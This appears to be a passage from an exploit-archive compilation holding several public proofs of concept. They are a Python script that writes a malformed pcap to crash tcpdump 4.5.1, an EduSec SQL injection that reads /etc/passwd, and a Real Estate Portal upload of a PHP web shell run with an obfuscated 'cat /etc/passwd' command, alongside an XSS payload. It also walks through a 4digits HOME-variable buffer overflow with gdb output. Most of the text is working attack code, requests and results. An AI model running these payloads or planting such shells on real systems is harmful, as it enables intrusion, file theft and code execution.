prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = 'tcpdump -r crash'
buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" tcpdump version 4.5.1 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()
EduSec 4.2.5 Multiple SQL Injection Vulnerabilities
Vendor: Rudra Softech
Product web page: http://www.rudrasoftech.com
Affected version: 4.2.5
Summary: EduSec has a suite of selective modules specifically
tailored to the requirements of education industry. EduSec is
engineered and designed considering wide range of management
functions within the university. With the use of EduSec, staff
can be more accountable as it helps to know the performance of
each department in just few seconds. Almost all departments within
education industry (e. g. admission, administration, time table,
examination, HR, finance etc) can be synchronized and accessed.
EduSec helps to assign the responsibilities to employee staff
and can reduce time wastage and can speed up the administrative
functions. Core functions like admissions, library management,
transport management, students’ attendance in short entire range
of university functions can be well performed by EduSec.
Desc: EduSec suffers from multiple SQL Injection vulnerabilities.
Input passed via multiple 'id' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: MySQL/5.5.35-0ubuntu0.12.04.2
Apache/2.4.12 (Ubuntu)
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5326
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5326.php
10.05.2016
--
Parameter: id (GET)
POC URL:
http://localhost/student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file%28%27/etc/passwd%27%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--#guardians
http://localhost/employee/emp-master/view?id=20%27
Request:
GET /student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=r18cpflgekesdn8cam8c8jmf86; _csrf=0f8795c6671d0db724d513142cc81e5d3ca8b83c094b970242fda96899be8148a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22E-TdUjNTZVVugL36t2p-VcoC6MBR4hqq%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; isRTL=0fc3d58c320669b52dea022e5a3db09649641bfdd1cbba93929ce2932c57707aa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22isRTL%22%3Bi%3A1%3Bi%3A0%3B%7D
Connection: close
Response:
HTTP/1.1 200 OK
Date: Fri, 13 May 2016 08:35:05 GMT
Server: Apache/2.4.12 (Ubuntu)
<....snip>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
.
..
...
....
.....
......
Real Estate Portal v4.1 Remote Code Execution Vulnerability
Vendor: NetArt Media
Product web page: http://www.netartmedia.net
Affected version: 4.1
Summary: Real Estate Portal is a software written in PHP,
allowing you to launch powerful and professional looking
real estate portals with rich functionalities for the private
sellers, buyers and real estate agents to list properties
for sale or rent, search in the database, show featured
ads and many others. The private sellers can manage their
ads at any time through their personal administration space.
Desc: Real Estate Portal suffers from an arbitrary file upload
vulnerability leading to an arbitrary PHP code execution. The
vulnerability is caused due to the improper verification of
uploaded files in '/upload.php' script thru the 'myfile' POST
parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script file with '.php' extension
that will be stored in the '/uploads' directory.
Tested on: nginx/1.10.0
PHP/5.2.17
MySQL/5.1.66
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5325
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php
06.05.2016
---
1. Arbitrary File Upload:
-------------------------
Parameter: myfile (POST)
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29
POST /upload.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/USERS/index.php
Content-Length: 419
Content-Type: multipart/form-data; boundary=---------------------------8914507815764
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
Connection: close
-----------------------------8914507815764
Content-Disposition: form-data; name="myfile"; filename="Test.php"
Content-Type: image/jpeg
<?php
system($_GET['cmd']);
?>
-----------------------------8914507815764
Content-Disposition: form-data; name=""
undefined
-----------------------------8914507815764
Content-Disposition: form-data; name=""
undefined
-----------------------------8914507815764--
2. Persistent Cross Site Scripting:
-----------------------------------
http://localhost/USERS/index.php
Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST)
Payload: " onmousemove=alert(1)
4digits 1.1.4 Local Buffer Overflow Privilege Escalation ( if setuid/setgid )
Discoverd by N_A , N_A [at] tutanota.com
Downloaded and tested upon Kali Linux
Vendor has been notified.
Description
-------------
4digits is a guess-the-number puzzle game. It's also called Bulls and Cows, and in China people simply call it Guess-the-Number. The game's objective is to guess a four-digit number in 8 times.
https://sourceforge.net/projects/fourdigits/
Vulnerability
--------------
4digits version 1.1.4 and possibly earlier versions suffer from a buffer overflow vulnerability where possible code execution can occur and privileges can be escalated if this is setuid/setgid.
The vulnerability is found within the 4digits-text binary version of the game.
An environment variable is not checked thoroughly before it is passed to the function save_score() when a user wins at the game. An attacker may be able to execute arbitary code:
4digits-text.c:
/* save current score in the score file */
void save_score(const int time_taken) {
time_t tm = time(NULL);
struct tm *today = localtime(&tm);
char tmpbuffer[129];
today = localtime(&tm);
char appdata_dir[4096]; //XXX why _PC_PATH_MAX is only 4? <----- The buffer we over flow
const char *score_filename = "4digits.4digits.scores";
strcpy(appdata_dir, getenv("HOME")); <------ Collecting "HOME"
strcat(appdata_dir, "/.4digits/");
char *scorefile = (char*)malloc(strlen(appdata_dir) + strlen(score_filename) + 1);
if(!scorefile)
err_exit(_("Memory allocation error.\n"));
strcpy(scorefile, appdata_dir); <------ Vulnerability here
strcat(scorefile, score_filename);
The save_score() function is called when the user successfully wins at the game and this is when the vulnerability becomes active, as per example below:
First, set the HOME variable as below
$ export HOME=`perl -e 'print"A"x5100'`
Then , load the game into GDB ( if you want to debug it in real time )
$ gdb 4digits-text
GNU gdb (Debian 7.10-1+b1) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from 4digits-text...done.
(gdb) run
To activate the bug you must run the game and then win/guess the right number:
(gdb) run
Starting program: /home/N/4digits-1.1.4/4digits-text
Input a 4-digit number:1234
2A0B 7 times left.
Input a 4-digit number:7934
1A1B 6 times left.
Input a 4-digit number:8235
3A0B 5 times left.
Input a 4-digit number:8236
3A0B 4 times left.
Input a 4-digit number:8239
3A0B 3 times left.
Input a 4-digit number:8237
4A0B 2 times left.
You win! :) Used 120 sec.
Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50
50 ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S: No such file or directory.
(gdb) i r
eax 0x0 0
ecx 0x1 1
edx 0x5 5
ebx 0x13f6 5110
esp 0xbfffd424 0xbfffd424
ebp 0xbfffe4f8 0xbfffe4f8
esi 0x0 0
edi 0x41414141 1094795585
eip 0xb7e854b6 0xb7e854b6 <__strlen_sse2_bsf+22>
eflags 0x10287 [ CF PF SF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) backtrace
#0 __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50
#1 0x08048f8f in save_score (time_taken=1094795585) at 4digits-text.c:183
#2 0x41414141 in ?? ()
#3 0x41414141 in ?? ()
#4 0x41414141 in ?? ()
#5 0x41414141 in ?? ()
#6 0x41414141 in ?? ()
#7 0x41414141 in ?? ()
#8 0x41414141 in ?? ()
#9 0x41414141 in ?? ()
#10 0x41414141 in ?? ()
#11 0x41414141 in ?? ()
#12 0x41414141 in ?? ()
#13 0x41414141 in ?? ()
#14 0x41414141 in ?? ()
#15 0x41414141 in ?? ()
#16 0x41414141 in ?? ()
#17 0x41414141 in ?? ()
#18 0x41414141 in ?? ()
#19 0x41414141 in ?? ()
#20 0x41414141 in ?? ()
#21 0x41414141 in ?? ()
#22 0x41414141 in ?? ()
By N_A , N_A [at] tutanota.com